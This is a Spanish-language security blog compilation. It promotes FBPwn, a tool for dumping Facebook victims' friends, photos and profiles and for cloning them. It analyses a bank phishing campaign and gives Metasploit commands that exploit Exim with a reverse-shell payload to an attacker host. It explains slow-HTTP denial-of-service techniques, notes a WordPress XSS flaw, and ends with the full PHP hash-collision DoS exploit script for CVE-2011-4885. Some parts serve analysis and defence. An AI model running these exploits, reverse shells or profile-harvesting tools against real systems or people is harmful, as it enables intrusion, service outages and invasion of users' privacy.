Facebook social engineering framework

El mismo creador del framework para explotar browser y que se integra a Metasploit llamado beef,  ahora libera FBPWN que es una plataforma basada en Java de para realizar ingeniería social a Facebook y sacar toda la información necesaria de un usuario, esta herramienta se puede utilizar para intentar descargar o atacar cuentas de usuario en Facebook directamente desde un Framework, este puede realizar las siguientes tareas:

· Volcar lista de amigos.
· Agregar todos los amigos de la víctima.
· Volcar todas las imágenes del álbumes de usuarios.
· Volcado de la información del perfil.
· Volcado de Fotos de perfil (Imágenes de perfil).
· Comprobar solicitud de amigos.
· Volcado los datos del muro de la víctima.
· Clon de los perfiles.

Para poder realizar el volcado de datos, debes agregar un usuario valido con su nombre y contraseña. Este se autenticara y le permitirá agregar a un usuario víctima y realizar todos lo que se muestra en la imagen siguiente y descrito anteriormente.

Este se autenticara y le permitirá agregar a un usuario víctima y realizar todos lo que se muestra en la imagen siguiente y descrito anteriormente.

Toda la información se almacena localmente por lo que incluso si la víctima desactiva su cuenta, el atacante podrá seguir contando con la información del usuario víctima.

Otro de los puntos interesantes, es que los desarrolladores permiten crear tus propios plugins, por lo cual es cosa de dejar volar la imaginación y en el siguiente link podrás encontrar información de como realizarlo: http://code.google.com/p/fbpwn/wiki/WritingYourOwnPlugin

Puedes realizar la descarga del framework desde el siguiente link: https://fbpwn.googlecode.com/files/FBPwn-beta-0.1.7.zip

Para poder conocer el funcionamiento del framework, está disponible el siguiente video tutorial: https://rapidshare.com/files/507532677/FBPwn-Video-Tutorial.ogv (Lo pueden visualizar con VLC)

URL del proyecto: http://code.google.com/p/fbpwn/

Phishing - Banco de Chile

Hace varios días que estoy recibiendo en mi casilla SPAM de pramirezh@gmail.com, una serie de correo electrónicos, el primero me indican en el asunto “Nueva Sincronizacion Por Mantenimiento”, y el último que me llegó dice “Ultimo aviso de Sincronizacion”, “Notese la falta ortográfica de los mensajes… como ya se podrán imaginar, es una campaña de phishing orientada a este banco, la cual me di el tiempo de analizar y ver como trabaja este o esta organización de phishers.

El origen:
Lo primero que se puede rescatar, es la técnica de suplantación de identidad, la cual se ve de la siguiente manera en el correo electrónico.

Si se dan cuenta, viene desde el origen b1.wweb.com.br, al cual si le realizamos un scan de puertos, nos encontramos con

Como se puede observar, existe el puerto 25, con el servidor Exim smtpd, versión 4.69, la cual es vulnerable a ejecución remota de código, y el exploit está disponible en nuestro buen amigo metasploit, la sentencia de explotación, y la cual tiene que haber seguido el atacante, para poder enviar correos electrónicos con otra identidad, es la siguiente:

msf>use exploit/unix/smtp/exim4_string_format

msf exploit(exim4_string_format) >set RHOST IP_SERVER_AFECTADO

msf exploit(exim4_string_format) >set PAYLOAD cmd/unix/reverse_perl

msf exploit(exim4_string_format) >set LHOST IP_HOST_ATACANTE

msf exploit(exim4_string_format) >exploit

 

Todas las opciones del exploit con:

msf exploit(exim4_string_format) >show options

 

 

Como ya sabemos, desde donde se envió el correo, y como falsificaron la identidad del banco, nos vamos al cuerpo del mensaje

 

Cuerpo:

Se ve algo así en la mayorías de los clientes SMTP:

 

Si bien es cierto, en Gmail está el cartel rojo que indica que puede ser un correo falsificado, en otros sistemas antispam o clientes SMTP no está presente, lo cual tiene un mayor grado de efectividad.

 

El link se ve bastante fidedigno a ojos de usuarios que no tienen mucha experiencia con este tipo de ataques (https://www.bancochile.cl/bchile-perfilamiento/), pero que pasa en el código fuente de este correo:

 

 

Claramente el href enviar al usuario a http://cl2013.sytes.net, este dominio está alojado en un servicio de www.NO-IP.com, y esta siendo utilizado para redireccionar a los usuarios a http://207.201.113.192, el cual contiene el aplicativo de phishing, como lo pueden observamos en la siguiente imagen.

Ahora tratamos de ver que servicios existen en esa dirección IP y donde está ubicada.

Versión de MySQL no actualizada ¿?   :-p, quizás por ahí toma el control del sitio para subir la aplicación de phishing… o quizás http://www.cvedetails.com/cve/CVE-2007-1742/ ¡!! Esto no es un rooter… solo un análisis de funcionamiento… en otra oportunidad será J

Ahora la IP, de donde es ¿?

Nada extraño… me hubiese llamado mucho la atención que estuviera alojado en Chile… le hubiese dedicado un par de horas más…

Veamos que dice un WAS

Definitivamente es explotable J

En resumen, después de esta análisis (bastante básico… y espero que no sea el último y mejorados), el phisher se movió de host, al parecer tienen que tener algún sistema de monitoreo, IPS o algo por el estilo, o quizás yo sea el paranoico y simplemente se cambio por que lo detectaron…

Para la próxima hacemos un rooter de phishing Chilensis… 

DoS ACK Technique

Las conexiones a Internet avanzan a una velocidad inusitada para poder dar un mejor servicio a los usuarios. Los ISPs, cada vez más, ofrecen anchos de banda descomunales a aquellos clientes que alojan sus páginas web. Lejos y atrás quedaron los tiempos en los que conseguir acceso (ya sea de forma lícita… o por las bravas) a una máquina con un gran ancho de banda, permitía tener el bastón de mando para "DoS-ear" servidores con conexiones a Internet más modestas. 

Por ello, actualmente, si no es mediante una botnet potente o una convocatoria Anonymous, hay que buscar alternativas a efectuar un DoS, que nada tengan que ver con colapsar las capacidades de ancho de banda del servidor. Así pues, tres de los últimos tipos de ataques DoS de servidores web, se basan precisamente en el envío de tráfico "muy lentamente", colapsando el número de sesiones máximas disponibles en el servidor.

Contando con predecesores como Slowloris y "Slow HTTP POST", Sergey Shekyan, desarrollador en Qualys, ha descubierto una nueva manera de colapsar servidores, y lo ha llamado "Slow Read".

Por resumir un poco el funcionamiento de los ataques DoS anteriores: 

·         En Slowloris, las peticiones al servidor se realizan enviando las cabeceras de la petición muy lentamente, no terminando nunca de ser enviadas. De esta manera, mientras el servidor no recibe todas las cabeceras, no considera como sesión web establecida, y no sabe si ha superado el número de conexiones máximas configuradas (por ejemplo, en Apache mediante la variable maxclients). En Slow HTTP POST, se envían al servidor las peticiones POST con todas las cabeceras, incluyendo "Content-Length" que indica el tamaño del POST DATA a enviar. Así, el servidor queda esperando a que el cliente envíe tantos bytes, como indique la cabecera "Content-Length". El ataque en sí se basa en que, los datos del POST, los irá enviando muy despacio el cliente hacia el servidor, consumiendo una sesión abierta por cada POST, así como los recursos que reserva el servidor para recibir los datos que envía el cliente.

·         En el caso del nuevo ataque DoS, Slow Read, el procedimiento consiste en enviar una petición lícita a un servidor, sin embargo, el éxito radica en ralentizar lo máximo posible la recepción de los datos por parte del servidor hacia el cliente. Al ser TCP el protocolo web, es decir, orientado a la conexión y con control de errores, hasta que el servidor no recibe los correspondientes paquetes con Flag ACK indicando al servidor que prosiga enviando el resto de los datos, no se dará por finalizada la sesión, y por ende, los recursos no serán liberados en el servidor.

Mitigar este tipo de ataques resulta muy complicado, puesto que no se basan en patrones detectables por mecanismos como IPS o WAF debido al tipo de la petición. De hecho, el WAF libre mod_security, implementa mecanismos que permiten mitigar este y otros tipos de Denegaciones de Servicio, en base a limitar el número de conexiones por IP origen que se encuentren en estado SERVER_BUSY_WRITE, mediante la configuración de la directiva SecWriteStateLimit. Otra forma de mitigación de este tipo de ataques es mediante la inclusión de límites de tiempo existentes por cada conexión, a la hora de recibir cabeceras, así como en las transmisiones de datos en el envío o de recepción. Sin embargo, estas medidas son peligrosas puesto que cuando las conexiones se efectúan tras un proxy de forma lícita por muchos clientes, se pueden dar situaciones que provoquen un falso positivo denegando un montón de conexiones.

Para poder hacer pruebas, evidentemente con fines académicos y en ningún momento con intenciones destructivas, se ha publicado de forma libre la herramienta Slowhttptest, que implementa los tres tipos de ataque descritos en este artículo.

XSS Wordpress 3.x PoC

Se ha reportado una vulnerabilidad crítica de XSS en WordPress 3.x que permitiría realizar un ataque de cross-site scripting (XSS) en un equipo afectado. El impacto de esta alerta se ha clasificado como crítica

Se recomienda actualizar a WordPress 3.3.1 y realizar un mantenimiento y actualización continua sobre todos los complementos utilizados.

Otras recomendaciones importantes:

·         Utilizar un Firewall de Aplicación Web (WAF) Recomiendo IMPERVA in the Cloud

·         Realizar un proceso de aseguramiento (hardening) del servidor utilizado. Principalmente del sistema operativo, de la base de datos (También existen Firewall de Bases de Datos), del servidor web y del lenguaje PHP (Recuerden la Colisión de Hashes de los diferente lenguajes). 

·         No utilizar programas, complementos, módulos o agregados en ambientes de producción sin realizar pruebas de seguridad. Tener en cuenta que muchos de los complementos disponibles no cuentan con una codificación que minimice los riesgos de seguridad.

·         Remover todo complemento o módulo que no sea necesario o utilizado y mantener actualizados tanto la aplicación WordPress, como todos los complementos utilizados.

Ahora lo entretenido, la prueba de concepto PoC:

Así se ve en el Browser:

Detalle de la Falla:

# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Hack: intext:"Proudly powered by WordPress"
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Greetz: Jigar Soni, Mr 52
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE :  UPS ¡!!!!

PoC - PHP Hashtables Denial of Service

Este es uno de los exploit (Lenguaje PHP) disponibles para el ataque expuesto por   Julian | zeri y Alexander ‘alech’ Klink  en la  Chaos Communication Congress. Cortesía de Exploit-DB y confeccionado por http://www.infodox.co.cc/.

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service

Exploit

 # Date: 1/1/12

 # Author: infodox

 # Software Link: php.net

 #

Version: 5.3.*

 # Tested on: Linux

 # CVE : CVE-2011-4885

Exploit

Download -- http://infodox.co.cc/Downloads/phpdos.txt

/----------------------------------------------------/

/*

PHP 5.3.* Hash Colission DoS Exploit by infodox

Original version by itz me (opensc.ws)

CVE-2011-4885

Mirrors List:

http://www.exploit-db.com/sploits/hashcollide.txt

http://compsoc.nuigalway.ie/~infodox/hashcollide.txt

http://jrs-s.net/hashcollide.txt

http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:

Different mirror for hashcollide.txt

Now takes target as a command line argument

Status message printing

Twitter: @info_dox

Blog: blog.infodox.co.cc

Site: http://www.infodox.co.cc/

*/

$targ = $argv[1];

$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...

while(1) {

 echo "firing";

 $ch = curl_init("$targ");

 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);

 curl_exec($ch);

 curl_close($ch);

 echo "[+] Voly Sent!";

}

?>